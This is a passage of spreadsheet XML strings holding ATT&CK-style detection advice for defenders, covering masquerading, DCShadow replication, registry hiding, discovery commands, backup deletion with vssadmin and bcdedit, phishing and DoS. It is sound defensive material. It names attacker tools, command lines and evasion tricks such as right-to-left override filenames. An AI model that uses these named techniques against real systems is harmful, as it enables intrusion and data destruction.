If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as &lt;code&gt;Assembly.Load()&lt;/code&gt; and [Native API](https://attack.mitre.org/techniques/T1106) functions such as &lt;code&gt;CreateThread()&lt;/code&gt;, &lt;code&gt;memfd_create()&lt;/code&gt;, &lt;code&gt;execve()&lt;/code&gt;, and/or &lt;code&gt;execveat()&lt;/code&gt;.(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)
Monitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.  (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for common command-line editors used to modify plist files located in auto-run locations, such as &lt;code&gt;\~/LaunchAgents&lt;/code&gt;, &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;, and an application's &lt;code&gt;Info.plist&lt;/code&gt;. 
Monitor for plist file modification immediately followed by code execution from &lt;code&gt;\~/Library/Scripts&lt;/code&gt; and &lt;code&gt;~/Library/Preferences&lt;/code&gt;. Also, monitor for significant changes to any path pointers in a modified plist.
Identify new services executed from plist modified in the previous user's session. </t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t xml:space="preserve">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 
Monitor cloud logs for API calls used for file or object enumeration for unusual activity. </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</si>
  <si>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</si>
  <si>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Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as &lt;code&gt;kubectl auth can-i&lt;/code&gt;.(Citation: K8s Authorization Overview)</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</si>
  <si>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Monitor for processes that can be used to enumerate user accounts, such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</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</si>
  <si>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Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</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</si>
  <si>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that look like process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For network infrastructure devices, collect AAA logging to monitor for `show` commands being run by non-standard users from non-standard locations.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</si>
  <si>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Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</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</si>
  <si>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information related to services.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</si>
  <si>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Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.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</si>
  <si>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</si>
  <si>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Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.
For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.</t>
  </si>
  <si>
    <t>Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</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</si>
  <si>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location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)
Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.</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</si>
  <si>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related to legitimate remote system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Monitor for processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
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t>
  </si>
  <si>
    <t xml:space="preserve">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Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.  </t>
  </si>
  <si>
    <t xml:space="preserve">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such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</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</si>
  <si>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for suspicious use of &lt;code&gt;gpresult&lt;/code&gt;. Monitor for the use of PowerShell functions such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt; and processes spawning with command-line arguments containing &lt;code&gt;GPOLocalGroup&lt;/code&gt;.
Monitor for abnormal LDAP queries with filters for &lt;code&gt;groupPolicyContainer&lt;/code&gt; and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.</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</si>
  <si>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For network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring.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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.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</si>
  <si>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related to legitimate remote system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</si>
  <si>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Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather  detailed system information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t xml:space="preserve">Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.
Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. </t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
If scripting is restricted for normal users, then any attempt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t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office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</si>
  <si>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 xml:space="preserve">Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. 
Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. </t>
  </si>
  <si>
    <t xml:space="preserve">Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. </t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to `%SystemRoot%` and `%ProgramFiles%` directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer.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</si>
  <si>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Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. 
In AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a "Get Snapshot SAS URL" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature)</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.
In cloud environments, the occurrence of anomalous high-volume deletion events, such as the &lt;code&gt;DeleteDBCluster&lt;/code&gt; and &lt;code&gt;DeleteGlobalCluster&lt;/code&gt; events in AWS, or a high quantity of data deletion events, such as &lt;code&gt;DeleteBucket&lt;/code&gt;, within a short period of time may indicate suspicious activity.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.
</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the &lt;code&gt;reload&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit and REAgentC. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).
For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.
When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser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</si>
  <si>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Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. 
Use of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. 
In macOS, you can review logs for "screensharingd" and "Authentication" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</t>
  </si>
  <si>
